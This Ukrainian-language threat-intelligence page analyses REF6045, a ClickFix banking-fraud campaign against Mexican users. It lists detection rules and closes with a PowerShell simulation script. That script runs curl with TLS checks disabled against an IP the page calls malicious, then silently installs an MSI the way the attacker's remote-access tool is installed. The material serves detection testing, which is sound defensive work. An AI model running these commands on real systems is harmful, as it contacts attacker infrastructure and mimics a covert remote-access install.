ClickFix до готівки: Аналіз інструментарію мексиканського банківського шахрайства
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
REF6045 – це кампанія з банківського шахрайства за участі операторів, яка зосереджена на мексиканському фінансовому секторі. Вона використовує метод доставки в стилі ClickFix з фальшивими сторінками CAPTCHA, щоб переконати жертв запустити зловмисні команди PowerShell. Після інфекції комплект інструментів SCMBANKER дозволяє операторам-людям спостерігати за банківськими сесіями, захоплювати скріншоти, змінювати вміст буфера обміну та розгортати віддалене керування Remote Utilities для повного віддаленого контролю.
Розслідування
Лабораторії безпеки Elastic виявили загрозу після виявлення підозрілого bitsadmin активність, яка завантажувала PowerShell-скрипти з відкритого каталогу. Розслідування викрило весь комплект інструментів через архів кореневого веб-доступу, zkt.zip, і виявило основні недоліки в операційній безпеці, включаючи неавтентифіковані редактори файлів і відкриті каталоги на інфраструктурі командування та управління. Аналіз також показав, що в комплекті інструментів містяться обширні AI-згенеровані артефакти в його кодовій базі.
Пом’якшення
Організації повинні обмежити використання PowerShell і bitsadmin для схвалених користувачів та провадити строго контрольоване виконання. Користувачів слід навчати розпізнавати приманки соціальної інженерії, такі як фальшиві підказки CAPTCHA або фальшиві екрани оновлення Windows. Команди безпеки також повинні розгорнути сильний моніторинг підозрілих змін в реєстрі та несанкціонованої установки програмного забезпечення для віддаленого доступу.
Відповідь
Якщо ця активність виявлена, негайно ізолюйте уражені системи, щоб зупинити комунікацію командування та управління і можливу крадіжку даних. Проведіть судово-медичне розслідування, щоб визначити масштаб компрометації та перевірте на наявність Remote Utilities або несанкціонованих змін в реєстрі. Скиньте паролі для всіх фінансових та інших чутливих облікових записів, які були доступні з уражених машин.
Потік Атак
Виявлення
MsiExec, породжений процесом оболонки (через cmdline)
Перегляд
Виконання Attrib для криючих файлів (через cmdline)
Перегляд
Підозрілі файли в публічному профілі користувача (через file_event)
Перегляд
Можливість виконання через приховані командні лінії PowerShell (через cmdline)
Перегляд
Використання вимкнення для примусового припинення або перезавантаження системи (через cmdline)
Перегляд
LOLBAS Bitsadmin (через cmdline)
Перегляд
Можлива затримка виконання (через cmdline)
Перегляд
Можливий облік або маніпуляція з групами (через cmdline)
Перегляд
Microsoft Edge породжує незвичайний процес (через cmdline)
Перегляд
Підозріле використання CURL (через cmdline)
Перегляд
Підозріле місцезнаходження виконання/скрипта через [cmd.exe /C] (через cmdline)
Перегляд
Виявлення SCMBANKER і установлення Remote Utilities [Створення процесу Windows]
Перегляд
Виявлення активності SCMBANKER Toolkit [Windows Powershell]
Перегляд
Виконання симуляції
Передумова: попередні телеметрія та опитування повинні бути пройдені.
Мотив: Цей розділ деталізує точне виконання техніки противника (TTP), розробленої для активації правила виявлення. Команди та розповідь МУТЬ безпосередньо відображати виявлені TTP та прагнуть згенерувати точну телеметрію, що очікується логікою виявлення. Абстрактні або неспоріднені приклади призведуть до неправильної діагностики.
-
Опис атаки та команди: Противник намагається закріпитися на цільовій системі, імітуючи шаблон банківського шахрайства REF6045. Спочатку вони намагаються завантажити файл перевірки з жорстко заданої IP-адреси, що містить шкідливий код (
68.211.161.46) з використаннямcurlз прапорцем-k(незахищений), щоб обійти перевірку SSL-сертифікатів. Після завантаження противник здійснює тиху установку шкідливого інструменту віддаленого доступу із застосуваннямmsiexec.exeз прапорцем/i(установка) та/quiet(тихий) перемикачі, цілеспрямовано на файл на ім’яhosts.msi. Це надає їм постійний віддалений доступ, мінімізуючи взаємодію з користувачем. -
Скрипт регресійного тестування:
# Скрипт симуляції для TTP REF6045 # Цей скрипт імітує конкретні командні лінії, визначені в правилі виявлення. $WorkDir = "$env:TEMPSimulation" if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir } Set-Location $WorkDir Write-Host "[+] Етап 1: Імітація передачі інструмента через curl..." -ForegroundColor Cyan # Примітка: Використовується фейковий файл через curl, щоб уникнути фактичного зловмисного трафіку, # але зберігаючи точний командний рядок, необхідний для виявлення. cmd /c curl -k https://68.211.161.46/validation.txt Write-Host "[+] Етап 2: Імітація тихої установки MSI..." -ForegroundColor Cyan # Створіть фейковий MSI файл, щоб msiexec не виходив одразу з помилкою (хоча правило спрацьовує на командному рядку) # З метою виключно тестування ЛОГІКИ ВИЯВЛЕННЯ (командного рядка), # ми виконуватимемо точну командну строку. msiexec /i "hosts.msi" /quiet /norestart -
Команди очищення:
# Скрипт очищення для видалення артефактів $WorkDir = "$env:TEMPSimulation" if (Test-Path $WorkDir) { Remove-Item -Recurse -Force $WorkDir Write-Host "[+] Очищення завершено: $WorkDir видалено." -ForegroundColor Green } else { Write-Host "[!] Очищення пропущено: Директорію не знайдено." -ForegroundColor Yellow }